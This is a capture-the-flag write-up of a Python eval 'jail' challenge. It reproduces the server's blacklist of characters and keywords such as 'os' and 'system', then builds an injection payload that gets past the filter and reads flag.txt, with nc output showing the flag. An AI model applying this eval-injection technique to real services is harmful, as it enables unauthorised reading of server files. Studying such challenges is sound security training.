Unbreakable [MISC]

Description :

Think you can escape my grasp? Challenge accepted! I dare you to try and break free, but beware, it won't be easy. I'm ready for whatever tricks you have up your sleeve!

Misc - 300 points

Walkthrough

We start by downloading the source files.

2KB

misc_unbreakable.zip

archive

We are given a

main.py file that probably runs on the server. We can connect to the server using nc 94.237.56.118 35970.

Looking at the main.py file, we see that we can provide input which will be executed via eval. Unfortuantely there is a blacklist that prevents us from using certain characters.

blacklist = [ ';', '"', 'os', '_', '\\', '/', '`',
              ' ', '-', '!', '[', ']', '*', 'import',
              'eval', 'banner', 'echo', 'cat', '%', 
              '&', '>', '<', '+', '1', '2', '3', '4',
              '5', '6', '7', '8', '9', '0', 'b', 's', 
              'lower', 'upper', 'system', '}', '{' ]

while True:
  ans = input('Break me, shake me!\n\n$ ').strip()
  
  if any(char in ans for char in blacklist):
    print(f'\n{banner1}\nNaughty naughty..\n')
  else:
    try:
      eval(ans + '()')
      print('WHAT WAS THAT?!\n')
    except:
      print(f"\n{banner2}\nI'm UNBREAKABLE!\n") 

Additionally a () is appended to the input, so we probably have to end our input with something that is callable.

Looking at the blacklist we figure out that we can use print to output things, open to open a file and read to read the contents of the file.

We can also use single quotes so this payload would be valid to read the flag:

open('flag.txt').read.

This would open the flag file and read its contents. Unfortunately this doesn't print the contents of the file, so we have to use print.

print(open('flag.txt').read()) doesn't work, because the appendend () would make it print(open('flag.txt').read())() which results in an error.

Fortunately eval supports multiple statements separated by a comma, so we can use print(open('flag.txt').read()),print to print the flag.

This is valid because the appended () would make it print(open('flag.txt').read()),print() which is a valid statement.

Connecting to the server and providing this input gives us the flag:

┌── 👽AKUMA 🥷 ➤➤ 🌐10.10.0.12
├──[   ~/Desktop/CTF/hackerroyale]
└─ ⚔ nc 94.237.56.118 35970
Break me, shake me!

$ print(open('flag.txt').read()),print
HTB{3v4l_0r_3vuln??}


WHAT WAS THAT?!

Break me, shake me!

$